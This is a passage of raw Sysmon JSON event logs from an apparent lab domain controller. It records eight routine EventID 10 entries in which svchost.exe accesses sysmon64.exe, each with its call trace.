06:57:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6449,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:01.964\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:01.964","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:57:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6450,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:01.964\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:01.964","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:57:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6451,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:01.964\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:01.964","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:57:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6452,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:01.964\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:01.964","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:57:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6453,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:01.964\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:01.964","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:57:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6454,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:01.964\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:01.964","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:57:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6455,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:01.964\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:01.964","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:57:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6456,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:01.964\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:01.964","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:57:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
